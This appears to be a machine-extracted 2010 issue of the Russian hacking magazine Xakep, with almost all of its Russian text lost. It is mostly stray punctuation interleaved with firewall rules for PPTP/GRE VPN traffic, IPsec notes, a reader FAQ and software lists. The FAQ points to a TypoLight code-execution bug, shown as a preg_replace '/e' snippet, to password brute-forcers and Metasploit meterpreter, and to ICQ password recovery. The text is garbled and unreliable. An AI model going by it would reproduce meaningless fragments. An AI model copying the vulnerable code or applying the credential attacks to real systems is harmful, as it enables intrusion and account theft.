,
VPN ,
.
PPTP
1723/TCP GRE
( 47):
iptables -A INPUT -p tcp -s IP_VPN_
-d _IP --sport 1723
-j ACCEPT
iptables -A INPUT -p gre -s IP_VPN_
-d _IP -j ACCEPT
iptables -A OUTPUT -d IP_VPN_
-s _IP -j ACCEPT
PF ,
(www.xakep.ru/magazine/
xa/109/160/1.asp), PPTP- FreeBSD/mpd
OpenBSD/poptop.
PPTP - NAT
, PPTP
NAT.
VPN .
Linux
ip_nat_pptp, :
THEGREENBOW IPSEC VPN CLIENT
# /sbin/modprobe ip_nat_pptp
. PF . ,
GRE-,
( ) IP-
PPTP
.
, PPTP
IPFW.
:
# vi /etc/rc.conf
firewall_enable="YES"
firewall_nat_enable="YES"
firewall_script="/etc/ipfw.gre"
:
X 04 /135/ 10
VPN
IP
KVPNC
VPN
*NIX
# vi /etc/ipfw.gre
#!/bin/sh
/sbin/ipfw -q /dev/stdin <<RULES
flush
nat 10 config if fxp0
add 10 nat 10 gre from any to any
add 11 nat 10 tcp from any to any dst-port pptp
add 12 nat 10 tcp from any pptp to any
add 11 nat 10 tcp from any to any dstport pptp
/etc/ipfw.gre :
# chmod +x /etc/ipfw.gre
PF PPTP
:
# vi /etc/pf.conf
no nat on $external proto gre all
no nat on $external proto tcp from any \
to any port = pptp
no nat on $external proto tcp from any \
port = pptp to any
pass quick on $external inet proto tcp from any \
to any port 1723
pass quick on $external inet proto tcp from any \
port 1723 to any
pass quick on $external inet proto gre \
from any to any
. PPTP
,
, Frickin PPTP Proxy (frickin.sf.net) pptpproxy
(mgix.com/pptpproxy).
OpenBSD 4.6-current npppd,
PPP L2TP, PPTP PPPoE.
SITE-TO-SITE VPN? .
, .
, ,
. VPN ,
: OpenVPN, L2TP/IPsec, PPTP,
X 04 /135/ 10
INFO
info
PPTP VPN
Win2k8
,
][ 2009 .
PPPoE
PPTP
Linux
PPP
(X_05_2008).
,
OpenSSH,
2008 ,
.
131
SYN/ACK
IPSEC
MICROSOFT
AH ( 51) Authentification Header,
.
IPsec 500
AH/ESP.
iptables:
DYNDNS IP
IPsec-tools (ipsec-tools.sf.net).
IPsec , ,
NAT .
NAT-Traversal (NAT-T), ESP UDP (ESPinUDP)
4500/
UDP.
NAT-Traversal,
IPsec.
, , .
DD-WRT (dd-wrt.com),
FreeWRT (freewrt.org), OpenWRT (openwrt.
org), Midge (midge.vlad.org.ua) .
Linux ESPinUDP,
NAT-Traversal ipsec.conf:
nat_traversal=yes
, IPsec,
Linux, : strongSwan (strongswan.org) Openswan
(www.openswan.org).
Windows NAT-T
2000/SP3 XP/SP2. -
132
IPSEC? Windows,
2000,
IPsec,
, .
.
TheGreenBow VPN Client (thegreenbow.com/
vpn.html),
,
-.
D-Link VPN Client IPsec ( 3DES/AES
NAT-T) VPN , D-Link.
, , , ,
KVpnc ( IPsec, IPsec/L2TP, PPTP,
OpenVPN, Cisco, Vtun SSH).
Shrew
Soft VPN Client (shrew.net),
Windows ( 2k Se7en), FreeBSD,
NetBSD, Linux. , IPsec-tools,
OpenSWAN, FreeSWAN, StrongSWAN Isakmpd.
, VPN-
.
. ,
. z
X 04 /135/ 10
UNITS
lozovsky@gameland.ru
PSYCHO:
:
-
, .
, 1500 . , , . ? !
. ,
? . - , ,
. , - ,
,
, ,
-
.
, , :
.
, , .
, :). ,
.
, - :
(, , ),
?
,
, ?
,
?
? ,
, (,
, .
).
, ,
, . ? ,
134
,
-. ( )
, . : , .
, :
,
.
,
. .
.
( , -
?). .
, $50
:).
,
,
.
,
Delphi 4 Pascal.
-
. , ,
- ,
,
,
.
,
, ,
,
, .
, , ,
, ,
, ,
:).
(,
), (
, ,
, ,
,
, , ,
) ,
-
.
,
.
.
. ,
,
. ,
.
, ,
. :
1. , .
,
,
, , . .
2.
. ,
?
3. X 04 /135/ 10
(
)
,
, .
, ,
,
, .
.
(
,
), (, ,
).
,
, (
,
,
,
..) ,
:
,
,
, ,
, . , ,
. ,
.
, :
,
, , . ,
, ,
? ? ,
.
:
4.
, .
(, ).
.
.
, , - -
. , , ,
.
. MadDoc:
. , ,
-
-, , ,
, , . , ,
-
, ,
.
? ! ,
- . ?
, , , .
.
,
?
X 04 /135/ 10
135
UNITS
,
,
, : I
want you!. ,
, .
,
.
, /
-. .
. , ,
(, -
- ,
), ,
.
1. ,
. ,
-
(),
.
2.
; , .
3. .
, ( )
. ,
136
,
;). ,
, :
, , , .
, , .
, ,
/, , .
.
.
, , .
(
,
, )
( , ,
..), ,
,
, . , -
: ,
,
. , , ,
, , , , ,
, , ,
:).
, . ,
, , , .
,
:).
, ,
,
.
( ). , , ,
.
, 430 plain texta :).
, .
, 7%
. 38%
, 55% . ,
.
.
, ,
(, ),
. ,
. ,
, ,
, , , , , . ,
,
:), .
. ,
,
X 04 /135/ 10
. !
][ , .
torrents.ru/rutracker.org !
!
, , . ,
, . , ,
, , , , - , ,
, .
. , , ,
, .
. , ,
,
, , , , ,
, 500
. , , 25
:).
,
,
, , , , . , :
- ,
, , , (-, ).
X 04 /135/ 10
137
UNITS
, .
. , .
, -
,
- :).
, :
, , . -
.
1. .
,
,
,
. ,
. , , ,
. .
.
,
. . , .
,
,
(
)
. :
(, -,
, -
138
?),
. ,
. ,
, , .
:
, ,
, .
, .
.
.
,
. , ,
,
.
.
, ,
. ,
, . . ,
,
, ,
.
, ,
.
2. .
, , :
, . ? ,
-
,
,
:).
, ,
, ,
. ( ,
), ,
(,
,
. ?),
,
. ? , . :
, ?
: -,
, , , , ,
!. ?
, ?
:
.
, , ,
.
,
.
X 04 /135/ 10
. ,
,
.
!
, (,
), ,
, , ,
,
, .
,
. , X 04 /135/ 10
,
,
:
. , ,
.
, .
,
:).
. ,
. ,
, -,
, .
][: , -
-?
..: . , . ,
, .
. ,
. : , , .
, . - :
, .
. , ,
. - .
. ,
- . , ,
, .
][: ! . - -, , . , - ?
.. , , .
: , .
. , ,
, .
: , . , ,
.
, , , .
, ,
. , ,
. ,
. , - .
, ,
, , ,
, , .
. ,
, , , , , .
, , , ,
,
100%
,
. , :). z
139
UNITS
Step twitter.com/stepah
faq
united
@real.xakep.ru
Q:
). ?
CMS -
A: vB
(fingerprinting)?
A:
Ruby
SQLite3 DB wafp (Web Application Finger
Printer).
:
1. -
, - CMS (,
javascript-, );
2. md5-
;
3. CMS.
phpMyAdmin (
/themes/darkblue_orange/img/b_info.png
):
phpmyadmin-2.11.8
:
1. ;
2.
;
3.
.
phpmyadmin-2.11.4
Q: ,
CMS?
www.mytty.org/
wafp.
(
),
http://sucuri.net/?page=docs&title=webappversion-detection.
CMS, (
)
WordPress . ,
Joomla Vulnerability Scanner
OWASP (www.owasp.org/index.
php/Category:OWASP_Joomla_Vulnerability_
Scanner_Project) CMS
Drupal Raz0r' (raz0r.name/drupalscan/).
Q: , vBulletin
+------------------------------------+
140
A: , , itdefence.ru/dbitems.
: .
,
PasswordsPro (www.insidepro.com/eng/
passwordspro.shtml).
,
forum.
insidepro.com.
Q: php-?
A: php-
( error_reporting
E_ALL) echo/print
( http://phpfaq.
ru/debug).
!
Expert Debugger (phpexperteditor.com), X 04 /135/ 10
CMS
PUNBB 1.2.X
QUICKSILVER FORUM
REFBASE (WEB REFERENCE DATABASE)
RUNCMS
SCRIPTEEN FREE IMAGE HOSTING SCRIPT
SHINOBU
SILVERSTRIPE
SLAED CMS
SMF 1.1.X
SMALLNUKE 2
SNEWS
SNITZ FORUMS 2000
TANGOCMS
TIKI WIKI
TINYPUG
TRIBIQ
TRITON CMS
USEBB
VANILLA
VBULLETIN 2.16
VBULLETIN 3.54
VIKINGBOARD
VOODOO CHAT
W-AGORA
WEBSITE BAKER
WORDPRESS <=2.3.3
WORDPRESS >=2.5
MD5($PASS) SHA-1
PHP Expert Editor.
DBG PHP Debugger,
IDE
.
:
PHP
;
breakpoints;
;
;
UTF-8;
profile;
IDE;
;
www.ankord.com.
Q:
ICQ-?
A: ICQ
Monitor (http://avtuh.ru/2009/11/27/icq-monitor.
html),
ICQ- (//).
(
)
. ,
QIP
:)
Q: FAQ
CMS .
?
X 04 /135/ 10
SHA1($USERNAME.$PASS)
MD5($PASS)
SHA-256
MD5($PASS)
"\\1")',
);
$strArticle = preg_
replace($arrSearch, $arrReplace,
$strArticle);
,
. ,
,
http://snipper.ru/
view/6/typolight-270-php-code-executionexploit.
Q: ,
MD5(MD5($PASS).$SALT)
MD5($PASS)
MD5($PHPBB3)
-
?
A: ( http- ),
-
http://exploit.in/tools/anonym.php.
:
IP;
User agent ;
Hostname;
;
JavaScript: ;
( JavaScript);
-;
;
;
;
;
( IE).
JavaScript.
js
,
OS. ,
Google Analytics Piwik (www.piwik.org).
Q: 3-./system/libraries/Controller.php
protected function
printArticleAsPdf(Database_Result
$objArticle)
{
$strArticle = preg_
replace('/\?pdf=[0-9]*/i', '',
$strArticle);
$arrSearch = array
(
'@(<pre.*</pre>)@Use',
);
$arrReplace = array
(
'str_replace("\n", "<br />",
.
.
A:
http://3character.com, 3- ,
.
(, , ,
):
141
UNITS
Moniker.com;
SEX.com, $12.000.000, 1/25/2006,
Private Transaction.
, ,
:)
Q: .
,
,
.
: AFP, CVS, FTP, HTTP,
IMAP, MS-SQL, MySQL, NCP (NetWare), NNTP,
PcAnywhere, POP3, PostgreSQL, rexec, rlogin,
rsh, SMB, SMTP (AUTH/VRFY), SNMP, SSHv2,
SVN, Telnet, VmAuthd, VNC.
,
. ,
,
, , ,
.
Q: -
(
LLLL, CCCC .. ?
Q: , DEP -
, ).
A: -
, ,
. .
, :
L - ;
N - ;
S - ;
C - ;
V - .
:
1. - (A, E, I, C, S, P, M, D, T);
2. (A, B, C, D, E, F, G, H, I, L, M, N, O, P,
R, S, T);
3. (J, K, U, V, W);
4. (Q, X, Y, Z).
A: DEP, , -
HTML-
Q: ,
Jimm.
?
A:
www.icq.com/password , ,
(
:).
, :
1. forum.asechka.ru
ICQ Password Recalling (IPR) karas3d;
2.
Jimm IP 127.0.0.1 ;
3. .
UIN
.
:
1. http://forum.motofan.ru/index.
php?showtopic=147890 Jimm
ICQ Password Recovery;
2. , Open .rms Jimm;
3. Scan ,
.
.rms ,
motofan.ru
.
Q: THC-Hydra, , ,
( , ).
, -
Q: , ?
A: ,
,
.
lsass.exe , .
Metasploit'
(relentless-coding.blogspot.com/2010/02/
windows-vista-7-targets-for-screen.html).
scripts/meterpreter Metasploit'. , ,
, ,
.
Q:
?
A: , .
:
?
A: Medusa (www.
foofus.net/jmk/medusa/medusa.html), 2.0.
-
142
,
dsquery ,
A: Ruby
iScanner (iscanner.isecur1ty.org).
iframe',
javascript, vbscript activex.
Q: , ,
(][
Userlevel! .
), ,
BSOD.
?
A: , -
,
TDSS ( Tidserv, TDL3
Alureon). . ,
(, ,
Vista, Windows 7). TDSS cleaning tool (www.norman.
com/support/support_tools/77201/en).
Q: Linux'
,
Bluetooth, (
) ?
A: PAM (Pluggable
Authentication Modules),
API-
. : ,
Bluetooth (
),
pam_blue (packages.gentoo.org/
package/sys-auth/pam_blue).
:
pam_usb (pamusb.org)
USB-;
pam_fprint (reactivated.net/fprint/wiki/Pam_
fprint) ;
pam-face-authentication (code.google.
com/p/pam-face-authentication) -.
,
. z
X 04 /135/ 10
>Net
Ad Muncher 4.81
Angry IP Scanner 3.0 Beta 4
ApexDC++ 1.3.0
CrossLoop 2.71
DNSBench
Halite 0.3.2.2
>Multimedia
Bullzip PDF Printer 7.1
Hornil StylePix 1.3.0
IOGraph 0.9
MediaInfo 0.7.28
Nuance PDF Reader 6
Picasa for Windows 3.6.0
ProgDVB v6.32.7
Screensaver Player 3.0
Sqirlz Morph 2.1
STDU Viewer 1.5.382
UVScreenCamera v4.4 beta
VSO Image Resizer 3.0
webcamXP 5 5.5
>Misc
Acer Gridvista 2.72.317
AM-DeadLink 4.0
BossMode 1.0
EverNote 3.5.2
File Association Fixer 1.0
Flexcrypt 3.3.0
Freeraser
LockHunter 1.0 Beta 3
Microsoft Keyboard Layout Creator 1.4
Mozilla Prism for Windows 1.0 Beta 3
MyEventViewer 1.25
MyPhoneExplorer 1.7.5
PeaZip 3.0
Polyglot 3000 3.44
Prio - Priority Saver 1.99
ProcessQuickLink
QTTabBar 1.2.3b5
RegScanner 1.80
TranslateIt! 8.0
WinDirStat 1.1.2
Windows Access Panel for Windows
7 & Vista
>>WINDOWS
>>Development
CollabNet Subversion 1.6.9
Database .NET 3.1.3712
Dependency Walker 2.2
EmEditor Professional 9.15
HiAsm 4.3
IncrediBuild 3.50
PatchFactory 3.3
Selenium 1.0.5
SQLiteStudio 1.1.3
SQLyog Community Edition 8.22
Syser Kernel Debugger 1.99.1900
Titanium Developer
VisualSVN 1.7.7
VisualSVN Server 2.1.1
WinHex 15.6
wyBuild 2.5
>>UNIX
>Desktop
Amarok 2.2.2
Anki 0.9.9.8.6
BashStyle-NG 7.9.1
BRL-CAD 7.16.4
Darktable 0.4
DeaDBeeF 0.3.2
DeVeDe 3.15.2
DjVuSmooth 0.2.2
Double Commander 0.4.5
Epidermis 0.5
gCAD3D 1.42
GRAMPS 3.1.3
Midnight Commander 4.7.0.2
NtEd 1.9.16
>System
Allmyapps
AnVir Task Manager
Bonkey for Windows
CPU-Z 1.53.5 Beta
Default Programs Editor 2.6
Defraggler 1.17
Driver Sweeper 2.1.0
DriverMax 5.5
Gizmo Central 2.7.7
HDDScan 3.2
Index Your Files 5.0
Ketarin 1.1.0
MONyog MySQL Monitor and Advisor
3.7.2
MySQL Community Server 5.1.44
Outpost Firewall Pro 2009
Panda Cloud Antivirus Free Edition
1.0.1
PostgreSQL 8.4.2
Quicksys RegDefrag 2.8
SIW 2010 (build 0210)
SUMo 2.7.5.86
>Security
BSQLHackerSetup 0909
DECAF 2.01
Heyoka 0.1.3
Imposter 0.9
John the Ripper 1.7.5
keimpx 0.2
LookInMyPC 2.0
Nessus 4.2.1
PenTBox 1.3.1
Sahi V3
Watcher 1.3.0
WebRaider 0.2.3.8
Websecurify 0.5RC1
WinFail2ban 0.1
MailBrowser 1.76
Opera 10.50
Seesmic for Windows 0.6
Skype 4.2
uTorrent 2.0
VisualRoute 2010 for Windows 14.0b
Wi-Fi Inspector 1.0.1
Wireshark for Windows 1.3.3
>Security
Browser Fuzzer 3
Burp Suite 1.3
FingerPrintFucker
GreenSQL 1.2.2
Groundspeed 1.1
Honeyd 1.5c
>Net
BitchX 1.1
Bitflu 0.97
EZ Intranet Messenger 1.2.4
FileZilla Client 3.3.2
gnetworktester 0.11
gWakeOnLan 0.5
I2P 0.7.11
Ipaudit 0.95
Midori 0.2.3
Mozilla Firefox 3.0.18
Nagstamon 0.9.2
Opera 10.10
Pidgin 2.6.6
Pino 0.2.0
SABnzbd 0.5.0
SeaMonkey 2.0.3
Sylpheed 3.0
Synchrorep 1.4.1
ZNC 0.080
>Games
Freeciv 2.2.0
>Devel
Ald 0.1.7
Autoconf Macro Archive
Code Browser 3.16
CodeInvestigator 0.22.1
crpcut 1.0.2
DreamPie 1.0
FireQuery 0.6
Git 1.7.0
itools 0.60.8
MoSync 2.3
Opera Dragonfly Alpha
Oracle Enterprise Pack for Eclipse
11g 11.1.1.4
ParseIRC 1.16
Picket 0.2.1
Rhodes 1.4
Seed7
Simple Sockets 1.4.0
SVN Access Manager 0.4.1.6
Trad4 3.1
UMLet 10.4
OpenOffice.org 3.2
OpenShot 1.0
QGIS 1.4
QPxtool 0.7.0
Rakarrack 0.4.2
Scilab 5.2.1
Sweet Home 3D 2.2
Thunar 1.1.0
Tomboy 1.0.1
zNotes 0.4.0
>X-distr
PC-BSD 8.0
>System
2click Update 5.0
AMD Catalyst 10.2
Deja Dup 13.91
Dstat 0.7.1
Gujin 2.8
Linux kernel 2.6.33
LTSP 5.2
Monit 5.1.1
nVidia 190.53
QEMU 0.12.3
Sudo 1.7.2p3
Syslinux 3.85
uBackup 4.95
Util-linux 2.17.1
VirtualBox 3.1.4
Wine 1.1.39
>Server
Apache 2.2.14
Asterisk 1.6.2
BIND 9.7.0
Cherokee 0.99.43
Clapf 0.4.4
CUPS 1.4.2
DHCP 4.1.1
HylaFax 5.4.1
IMSpector 0.9
KDE Personal WebServer 0.1
MoSSHe 10.2.22
MySQL 5.1.44
OpenLDAP 2.4.21
OpenSSH 5.3
OpenVPN 2.1.1
Postfix 2.7.0
ProFTPD 1.3.3
Samba 3.4.6
Sendmail 8.14.4
Squid 3.0.STABLE24
Httptunnel 3.0.5
iScanner 0.1
John the Ripper 1.7.5
Medusa 2.0
Netsniff-ng 0.5.4.2
Nikto 2.1.1
OpenDNSSEC 1.0.0
Portsentry 1.2
Privoxy 3.0.16
Snort 2.8.5.3
SquidClamAv 5.1
Suricata 0.8.1
UnHash 1.1
Zebedee 2.4.1
04(135) 2010
. 58
ACTIVEX
. 44
. 68
HARDWARE-DEP
DEP
04 (135) 2010
. 90
LINUX ?
. 96
.NET REMOTING:
GRID-
: 2
10
.
UNITS
HTTP:// WWW2
torrent-
TORRENT2EXE
www.torrent2exe.com
, ? ,
, , ,
. , , BitTorrent-,
, ?
,
www.torrent2exe.com .torrent-,
. ,
BitTorrent-.
PASTIE
www.pastie.org
- , - ,
XML-, ,
, Pastie . , -
(, C++ Python). , ,
.
,
.
- .
-
Python
UTILITY MILL
www.utilitymill.com
IZZYMENU
-? , -
. , Utility Mill, . , Python,
,
. , ,
.
, .
API .
, , - CSS
. IzzyMenu
,
, -
, ,
. IzzyMenu :
][ .
144
www.izzymenu.com
X 04 /135/ 10